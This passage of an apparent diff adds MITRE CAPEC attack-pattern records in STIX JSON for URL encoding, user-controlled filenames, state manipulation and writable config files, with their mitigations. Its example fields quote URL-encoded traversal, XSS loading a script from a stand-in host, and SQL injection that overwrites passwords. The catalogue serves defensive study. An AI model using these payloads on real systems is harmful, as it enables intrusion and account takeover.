"http://www.cgisecurity.com/lib/URLEmbeddedAttacks.html" + }, + { + "description": "T. Berners-Lee, R. Fielding, L. Masinter, RFC 3986 - Uniform Resource Identifier (URI): Generic Syntax, 2005--01", + "external_id": "REF-496", + "source_name": "reference_from_CAPEC", + "url": "http://www.ietf.org/rfc/rfc3986.txt" + }, + { + "description": "T. Berners-Lee, L. Masinter, M. 
McCahill, RFC 1738 - Uniform Resource Locators (URL), 1994--12", + "external_id": "REF-497", + "source_name": "reference_from_CAPEC", + "url": "http://www.ietf.org/rfc/rfc1738.txt" + }, + { + "description": "HTML URL Encoding Reference, W3Schools.com, Refsnes Data", + "external_id": "REF-498", + "source_name": "reference_from_CAPEC", + "url": "http://www.w3schools.com/tags/ref_urlencode.asp" + }, + { + "description": "The URLEncode and URLDecode Page, Albion Research Ltd", + "external_id": "REF-499", + "source_name": "reference_from_CAPEC", + "url": "http://www.albionresearch.com/misc/urlencode.php" + }, + { + "description": "David Wheeler, Secure Programming for Linux and Unix HOWTO", + "external_id": "REF-500", + "source_name": "reference_from_CAPEC", + "url": "http://www.dwheeler.com/secure-programs/Secure-Programs-HOWTO/filter-html.html#VALIDATING-URIS" + } + ], + "id": "attack-pattern--d859e461-7ca6-46a6-842e-3f1750bc8415", + "modified": "2022-09-29T00:00:00.000Z", + "name": "URL Encoding", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--a1af7c24-25cb-46e5-a27b-ed316e1f91ce" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Resource Consumption (Denial of Service)", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Read Data", + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Gain Privileges" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n URL Encodings in IceCast MP3 Server.\n The following type of encoded string has been known traverse directories against the IceCast MP3 server9:\n 
http://[targethost]:8000/somefile/%2E%2E/target.mp3\n or using\n \"/%25%25/\" instead of \"/../\".\n The control character \"..\" can be used by an adversary to escape the document root.See also: CVE-2001-0784", + "\n Cross-Site Scripting\n \n URL-Encoded attack:http://target/getdata.php?data=%3cscript%20src=%22http%3a%2f%2fwww.badplace.com%2fnasty.js%22%3e%3c%2fscript%3e\n \n HTML execution:\n [REF-495]\n ", + "\n SQL Injection\n \n Original database query in the example file - \"login.asp\":SQLQuery = \"SELECT preferences FROM logintable WHERE userid='\" & Request.QueryString(\"userid\") & \"' AND password='\" & Request.QueryString(\"password\") & \"';\"\n \n URL-encoded attack:http://target/login.asp?userid=bob%27%3b%20update%20logintable%20set%20passwd%3d%270wn3d%27%3b--%00\n \n Executed database query:SELECT preferences FROM logintable WHERE userid='bob'; update logintable set password='0wn3d';\n From \"URL encoded attacks\", by Gunter Ollmann - http://www.cgisecurity.com/lib/URLEmbeddedAttacks.html\n ", + "\n Combined Encodings CesarFTP\n Alexandre Cesari released a freeware FTP server for Windows that fails to provide proper filtering against multiple encoding. The FTP server, CesarFTP, included a Web server component that could be attacked with a combination of the triple-dot and URL encoding attacks.\n An adversary could provide a URL that included a string like\n /...%5C/\n This is an interesting exploit because it involves an aggregation of several tricks: the escape character, URL encoding, and the triple dot.See also: CVE-2001-1335" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey web application for URLs with parameters: Using a browser, an automated tool or by inspecting the application, an adversary records all URLs that contain parameters.

  2. Techniques
    Use a spidering tool to follow and record all links and analyze the web pages to find entry points. Make special note of any links that include parameters in the URL.

Experiment

  1. Probe URLs to locate vulnerabilities: The adversary uses the URLs gathered in the \"Explore\" phase as a target list and tests parameters with different encodings of special characters to see how the web application will handle them.

  2. Techniques
    Use URL encodings of special characters such as semi-colons, backslashes, or question marks that might be filtered out normally.
    Combine the use of URL encodings with other encoding techniques such as the triple dot and escape slashes.

Exploit

  1. Inject special characters into URL parameters: Using the information gathered in the \"Experiment\" phase, the adversary injects special characters into the URL using URL encoding. This can lead to path traversal, cross-site scripting, SQL injection, etc.

", + "x_capec_extended_description": "\n A URL may contain special character that need special syntax handling in order to be interpreted. Special characters are represented using a percentage character followed by two digits representing the octet code of the original character (%HEX-CODE).\n For instance US-ASCII space character would be represented with %20. This is often referred as escaped ending or percent-encoding. Since the server decodes the URL from the requests, it may restrict the access to some URL paths by validating and filtering out the URL requests it received. An adversary will try to craft an URL with a sequence of special characters which once interpreted by the server will be equivalent to a forbidden URL.\n It can be difficult to protect against this attack since the URL can contain other format of encoding such as UTF-8 encoding, Unicode-encoding, etc. The adversary could also subvert the meaning of the URL string request by encoding the data being sent to the server through a GET request. For instance an adversary may subvert the meaning of parameters used in a SQL request and sent through the URL string (See Example section).\n ", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The application should accepts and decodes URL input.", + "The application performs insufficient filtering/canonicalization on the URLs." + ], + "x_capec_skills_required": { + "Low": "An adversary can try special characters in the URL and bypass the URL validation.", + "Medium": "The adversary may write a script to defeat the input filtering mechanism." 
+ }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--000e54be-d542-4ff3-9e55-2b5ce4b1023d", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--1f048925-3094-483c-abf2-c5efe689193a", + "spec_version": "2.1", + "target_ref": "attack-pattern--d859e461-7ca6-46a6-842e-3f1750bc8415", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--1e04db14-a140-40e0-aafe-1ec097c9a4d2", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--1890182c-6989-4e34-bfb2-92b223bcae0c", + "spec_version": "2.1", + "target_ref": "attack-pattern--d859e461-7ca6-46a6-842e-3f1750bc8415", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a27b504b-7f3c-47fb-ad70-9a9042fe74bd", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--24852297-758a-489f-b2c9-a27cbfbb938e", + "spec_version": "2.1", + "target_ref": "attack-pattern--d859e461-7ca6-46a6-842e-3f1750bc8415", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": 
"relationship--fece2ddc-b7fd-4f9e-a015-51a13642ef80", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3833d761-4a54-4ed3-994b-c7c76c465ae0", + "spec_version": "2.1", + "target_ref": "attack-pattern--d859e461-7ca6-46a6-842e-3f1750bc8415", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--506ec38c-6161-4411-b56b-cf20c5960c3c", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--001320df-5e57-4ed3-bcf8-7e79dfe846aa", + "spec_version": "2.1", + "target_ref": "attack-pattern--d859e461-7ca6-46a6-842e-3f1750bc8415", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Be aware of the threat of alternative method of data encoding and obfuscation technique such as IP address encoding. 
(See related guideline section)", + "id": "course-of-action--11783efd-94f2-4741-93c8-e33b1de782b8", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-72-5", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--2e586d60-d396-45aa-bfa2-afbd31a70dbb", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--11783efd-94f2-4741-93c8-e33b1de782b8", + "spec_version": "2.1", + "target_ref": "attack-pattern--d859e461-7ca6-46a6-842e-3f1750bc8415", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--32ed5b33-4ffc-4a9a-b6bf-f389799a677b", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--95ef6587-c787-4051-b664-b5e8ca753c20", + "spec_version": "2.1", + "target_ref": "attack-pattern--d859e461-7ca6-46a6-842e-3f1750bc8415", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attack of this type involves an adversary inserting malicious characters (such as a XSS redirection) into a filename, directly or indirectly that is then used by the target software to generate HTML text or other potentially executable content. 
Many websites rely on user-generated content and dynamically build resources like files, filenames, and URL links directly from user supplied data. In this attack pattern, the attacker uploads code that can execute in the client browser and/or redirect the client browser to a site that the attacker owns. All XSS attack payload variants can be used to pass and exploit these vulnerabilities.", + "external_references": [ + { + "external_id": "CAPEC-73", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/73.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-184", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/184.html" + }, + { + "external_id": "CWE-96", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/96.html" + }, + { + "external_id": "CWE-348", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/348.html" + }, + { + "external_id": "CWE-116", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/116.html" + }, + { + "external_id": "CWE-350", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/350.html" + }, + { + "external_id": "CWE-86", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/86.html" + }, + { + "external_id": "CWE-697", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html" + }, + { + "description": "G. Hoglund, G. 
McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--f156c3d0-eeb3-4e12-b075-8995c009de55", + "modified": "2017-05-01T00:00:00.000Z", + "name": "User-Controlled Filename", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_precede_refs": [ + "attack-pattern--800f8095-99b6-4bb9-8bc6-8b9727201a2f" + ], + "x_capec_child_of_refs": [ + "attack-pattern--f8533ce1-5f23-4660-8f70-1a05af2c70d3" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Alter Execution Logic" + ], + "Confidentiality": [ + "Gain Privileges", + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Read Data" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "Phishing attacks rely on a user clicking on links on that are supplied to them by attackers masquerading as a trusted resource such as a bank or online auction site. The end user's email client hosts the supplied resource name in this case via email. The resource name, however may either 1) direct the client browser to a malicious site to steal credentials and/or 2) execute code on the client machine to probe the victim's host system and network environment." + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The victim must trust the name and locale of user controlled filenames." 
+ ], + "x_capec_skills_required": { + "High": "Exploiting a client side vulnerability to inject malicious scripts into the browser's executable process.", + "Low": "To achieve a redirection and use of less trusted source, an attacker can simply edit data that the host uses to build the filename", + "Medium": "Deploying a malicious \"look-a-like\" site (such as a site masquerading as a bank or online auction site) that the user enters their authentication data into." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5a1e9288-e1cd-4661-bafa-f7a7f61e4a8c", + "modified": "2017-05-01T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--094a4c09-e49c-422b-b8ec-b51c19dba18c", + "spec_version": "2.1", + "target_ref": "attack-pattern--f156c3d0-eeb3-4e12-b075-8995c009de55", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d5da4f75-8c61-4081-b026-75f19ec8f8a1", + "modified": "2017-05-01T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e9836d98-9116-4902-ba62-2c4fcc7e03c3", + "spec_version": "2.1", + "target_ref": "attack-pattern--f156c3d0-eeb3-4e12-b075-8995c009de55", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--15e190ea-a35c-4658-b69e-402f5cec7ad9", + "modified": "2017-05-01T00:00:00.000Z", + "object_marking_refs": [ + 
"marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8a996efc-52e0-4aaf-953a-21c3fe64c64b", + "spec_version": "2.1", + "target_ref": "attack-pattern--f156c3d0-eeb3-4e12-b075-8995c009de55", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--bdccd87f-be5a-4567-acac-ded05ba22454", + "modified": "2017-05-01T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4f20a4a7-cb6a-477b-a12a-13c5e9d03353", + "spec_version": "2.1", + "target_ref": "attack-pattern--f156c3d0-eeb3-4e12-b075-8995c009de55", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--060fd8e7-cc86-47f8-b257-2e90a6935da9", + "modified": "2017-05-01T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f31f11cb-6403-4667-bf43-d77242ac7ae2", + "spec_version": "2.1", + "target_ref": "attack-pattern--f156c3d0-eeb3-4e12-b075-8995c009de55", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Scan dynamically generated content against validation specification", + "id": "course-of-action--36312b31-f41b-4f9e-8a90-8f9bdabbaeec", + "modified": "2017-05-01T00:00:00.000Z", + "name": "coa-73-5", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + 
"x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fbbc43fd-aa0e-44e4-98a4-ff409bf08afb", + "modified": "2017-05-01T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--36312b31-f41b-4f9e-8a90-8f9bdabbaeec", + "spec_version": "2.1", + "target_ref": "attack-pattern--f156c3d0-eeb3-4e12-b075-8995c009de55", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n The adversary modifies state information maintained by the target software or causes a state transition in hardware. If successful, the target will use this tainted state and execute in an unintended manner.\n State management is an important function within a software application. User state maintained by the application can include usernames, payment information, browsing history as well as application-specific contents such as items in a shopping cart. 
Manipulating user state can be employed by an adversary to elevate privilege, conduct fraudulent transactions or otherwise modify the flow of the application to derive certain benefits.\n If there is a hardware logic error in a finite state machine, the adversary can use this to put the system in an undefined state which could cause a denial of service or exposure of secure data.\n ", + "external_references": [ + { + "external_id": "CAPEC-74", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-372", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/372.html" + }, + { + "external_id": "CWE-315", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/315.html" + }, + { + "external_id": "CWE-353", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/353.html" + }, + { + "external_id": "CWE-693", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/693.html" + }, + { + "external_id": "CWE-1245", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1245.html" + }, + { + "external_id": "CWE-1253", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1253.html" + }, + { + "external_id": "CWE-1265", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1265.html" + }, + { + "external_id": "CWE-1271", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1271.html" + } + ], + "id": "attack-pattern--649abc91-f615-4c9e-91c9-9e66131e2d78", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Manipulating State", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Unreliable Execution" + ], + 
"Confidentiality": [ + "Gain Privileges" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software", + "Hardware" + ], + "x_capec_example_instances": [ + "\n During the authentication process, an application stores the authentication decision (auth=0/1) in unencrypted cookies. At every request, this cookie is checked to permit or deny a request.\n An adversary can easily violate this representation of user state and set auth=1 at every request in order to gain illegitimate access and elevated privilege in the application.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Adversary determines the nature of state management employed by the target. This includes determining the location (client-side, server-side or both applications) and possibly the items stored as part of user state.

Experiment

  1. The adversary now tries to modify the user state contents (possibly indiscriminately if the contents are encrypted or otherwise obfuscated) or cause a state transition and observe the effects of this change on the target.

Exploit

  1. Having determined how to manipulate the state, the adversary can perform illegitimate actions.

", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--750dc5a2-e3c4-42d7-ad8a-25a7d1116f03", + "attack-pattern--efbf3dcf-9f19-45de-9f49-caa87fd34681" + ], + "x_capec_prerequisites": [ + "User state is maintained at least in some way in user-controllable locations, such as cookies or URL parameters.", + "There is a faulty finite state machine in the hardware logic that can be exploited." + ], + "x_capec_resources_required": [ + "The adversary needs a data tampering tool capable of generating and creating custom inputs to aid in the attack, like Fiddler, Wireshark, or a similar in-browser plugin (e.g., Tamper Data for Firefox)." + ], + "x_capec_skills_required": { + "Medium": "The adversary needs to have knowledge of state management as employed by the target application, and also the ability to manipulate the state in a meaningful way." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Do not rely solely on user-controllable locations, such as cookies or URL parameters, to maintain user state.", + "id": "course-of-action--426e0345-2074-48c8-9a3d-b7f7550e3712", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-74-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--002041eb-05e7-4cd3-ba28-e881bb148370", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--426e0345-2074-48c8-9a3d-b7f7550e3712", + "spec_version": "2.1", + 
"target_ref": "attack-pattern--649abc91-f615-4c9e-91c9-9e66131e2d78", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Avoid sensitive information, such as usernames or authentication and authorization information, in user-controllable locations.", + "id": "course-of-action--ea5c5ff6-e6bb-4b4a-8c73-9aa87a9f9974", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-74-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d901ded9-6bd3-4d45-b338-71715e666e92", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ea5c5ff6-e6bb-4b4a-8c73-9aa87a9f9974", + "spec_version": "2.1", + "target_ref": "attack-pattern--649abc91-f615-4c9e-91c9-9e66131e2d78", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Sensitive information that is part of the user state must be appropriately protected to ensure confidentiality and integrity at each request.", + "id": "course-of-action--3d2a63b7-8651-46d9-9b31-187b55061c36", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-74-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": 
"relationship--2eab1469-094c-46e2-b78f-9a9d3108e08b", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3d2a63b7-8651-46d9-9b31-187b55061c36", + "spec_version": "2.1", + "target_ref": "attack-pattern--649abc91-f615-4c9e-91c9-9e66131e2d78", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "All possible states must be handled by hardware finite state machines.", + "id": "course-of-action--638372f7-a792-4269-acd6-cfb761391fd6", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-74-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0bde6497-61aa-43b6-b9ed-7a55f500f332", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--638372f7-a792-4269-acd6-cfb761391fd6", + "spec_version": "2.1", + "target_ref": "attack-pattern--649abc91-f615-4c9e-91c9-9e66131e2d78", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Generally these are manually edited files that are not in the preview of the system administrators, any ability on the attackers' behalf to modify these files, for example in a CVS repository, gives unauthorized access directly to the application, the same as authorized users.", + "external_references": [ + { + 
"external_id": "CAPEC-75", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/75.html" + }, + { + "external_id": "CWE-349", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/349.html" + }, + { + "external_id": "CWE-99", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/99.html" + }, + { + "external_id": "CWE-77", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/77.html" + }, + { + "external_id": "CWE-346", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/346.html" + }, + { + "external_id": "CWE-353", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/353.html" + }, + { + "external_id": "CWE-354", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/354.html" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--08c74bd3-c5ad-4d6c-a8bb-bb93d7503ddb", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Manipulating Writeable Configuration Files", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--f9f65fdd-5857-4a57-a725-066465397601" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n The BEA Weblogic server uses a config.xml file to store configuration data. If this file is not properly protected by the system access control, an attacker can write configuration information to redirect server output through system logs, database connections, malicious URLs and so on. 
Access to the Weblogic server may be from a so-called Custom realm which manages authentication and authorization privileges on behalf of user principals. Given write access, the attacker can insert a pointer to a custom realm jar file in the config.xml\n < CustomRealmConfigurationData=\"java.util.Properties\"Name=\"CustomRealm\"RealmClassName=\"Maliciousrealm.jar\"/>\n \n The main issue with configuration files is that the attacker can leverage all the same functionality the server has, but for malicious means. Given the complexity of server configuration, these changes may be very hard for administrators to detect.\n " + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "Configuration files must be modifiable by the attacker" + ], + "x_capec_skills_required": { + "Medium": "To identify vulnerable configuration files, and understand how to manipulate servers and erase forensic evidence" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--390b777d-a7f5-499e-b105-e88b8b537dc7", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": 